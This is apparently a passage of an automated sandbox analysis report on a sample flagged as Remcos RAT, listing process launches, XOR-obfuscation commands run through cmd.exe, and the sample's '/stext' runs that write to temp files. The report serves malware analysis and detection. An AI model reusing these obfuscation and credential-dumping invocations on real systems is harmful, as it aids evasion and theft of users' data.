                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:102
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:103
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:104
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:105
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:106
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:107
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:108
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:109
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:110
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:111
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:112
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "133^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:113
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:114
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "157^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:115
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:116
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:117
                                                                                                                                                                                  Start time:10:51:38
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:118
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "216^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:119
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:120
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "145^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:121
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:122
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:123
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:124
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "201^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:125
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:126
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "137^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:127
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:128
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:cmd.exe /c set /a "129^177"
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:236'544 bytes
                                                                                                                                                                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:129
                                                                                                                                                                                  Start time:10:51:39
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                                  Wow64 process (32bit):
                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                  Imagebase:
                                                                                                                                                                                  File size:875'008 bytes
                                                                                                                                                                                  MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                                                                                                                  Has elevated privileges:
                                                                                                                                                                                  Has administrator privileges:
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:130
                                                                                                                                                                                  Start time:10:52:13
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:"C:\Users\user\Desktop\asXlZG3aW6.exe"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:131
                                                                                                                                                                                  Start time:10:52:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\lmosdawqehkmlcbfmkivthwvnjpkkkqrhv"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:132
                                                                                                                                                                                  Start time:10:52:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\wotkesh"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  General

                                                                                                                                                                                  Target ID:133
                                                                                                                                                                                  Start time:10:52:35
                                                                                                                                                                                  Start date:08/10/2024
                                                                                                                                                                                  Path:C:\Users\user\Desktop\asXlZG3aW6.exe
                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\asXlZG3aW6.exe /stext "C:\Users\user\AppData\Local\Temp\yiydflrlgx"
                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                  File size:292'592 bytes
                                                                                                                                                                                  MD5 hash:51BFAB682069E4E7A2BA7B8379D3927B
                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  Reset < >

                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                    Execution Coverage:22.5%
                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:14.2%
                                                                                                                                                                                    Signature Coverage:20.1%
                                                                                                                                                                                    Total number of Nodes:1483
                                                                                                                                                                                    Total number of Limit Nodes:48
